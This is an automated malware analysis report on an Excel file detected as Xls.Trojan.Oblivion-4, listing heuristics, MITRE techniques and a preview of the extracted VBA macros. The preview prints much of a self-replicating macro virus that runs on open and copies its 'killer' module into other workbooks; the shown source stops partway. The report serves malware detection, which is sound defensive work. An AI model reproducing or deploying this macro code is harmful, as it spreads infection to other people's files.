Verdict: MALICIOUS
Risk Score: 120
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The critical ClamAV detection and high-severity heuristic for an Auto_Open macro indicate malicious intent. The Auto_Open subroutine in the VBA script is designed to execute upon opening the Excel file, likely to perform further malicious actions. The script attempts to manipulate the workbook and potentially drop or execute other malicious files, as suggested by the presence of 'ACF.XLS' in the script logic.
Heuristics (3)
- ClamAV: Xls.Trojan.Oblivion-4 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Trojan.Oblivion-4
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- Auto_Open macro (high, OLE_VBA_AUTO): Auto_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11336 bytes |

SHA-256: 66567ad58c15fcd46f2baa36ee64ff47d7b1b073dea9cbaa0555f59029e5283c

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "killer"
Sub Auto_Open()
Application.OnSheetActivate = "kill"
End Sub
Sub KILL()
sStpath = Application.StartupPath
vname = Dir(sStpath & "\" & "ACF.XLS")
If UCase(vname) = "ACF.XLS" Then
p = 1
Else
p = 0
End If
If UCase(ActiveWorkbook.Name) = "ACF.XLS" Then
ActiveWindow.Visible = False
Else
Select Case p
Case 1
Application.ScreenUpdating = False
oldfname = ActiveWorkbook.Name
thisfname = ThisWorkbook.Name
NumOfCmp = ActiveWorkbook.VBProject.VBComponents.Count
For n = 1 To NumOfCmp
ntype = ActiveWorkbook.VBProject.VBComponents(n).Type
If ntype = 1 And ActiveWorkbook.VBProject.VBComponents(n).Name = "killer" Then
w = 1
Exit For
Else
If n = NumOfCmp Then
w = 0
ActiveWorkbook.VBProject.VBComponents.Add (1)
Set Acts1 = Workbooks(oldfname).VBProject.VBComponents(n + 1)
Set shashou = Workbooks(thisfname).VBProject.VBComponents("killer")
ssCl = shashou.CodeModule.CountofLines
For i = 1 To ssCl
Acts1.CodeModule.InsertLines i, shashou.CodeModule.Lines(i, 1)
Next i
Acts1.Name = "killer"
End If
End If
Next n
Application.ScreenUpdating = True
Case 0
Application.ScreenUpdating = False
thisfname = ThisWorkbook.Name
Workbooks.Add
With ActiveWorkbook
.Title = ""
.Subject = ""
.Author = ""
.Keywords = ""
.Comments = ""
End With
newfname = ActiveWorkbook.Name
NumOfCmp = ActiveWorkbook.VBProject.VBComponents.Count
For n = 1 To NumOfCmp
ntype = ActiveWorkbook.VBProject.VBComponents(n).Type
If ntype = 1 Then
w = 1
Exit For
Else
If n = NumOfCmp Then
w = 0
ActiveWorkbook.VBProject.VBComponents.Add (1)
End If
End If
Next n
Set Acts1 = Workbooks(newfname).VBProject.VBComponents(n)
Set shashou = Workbooks(thisfname).VBProject.VBComponents("killer")
ssCl = shashou.CodeModule.CountofLines
For i = 1 To ssCl
Acts1.CodeModule.InsertLines i, shashou.CodeModule.Lines(i, 1)
Next i
A
... (truncated)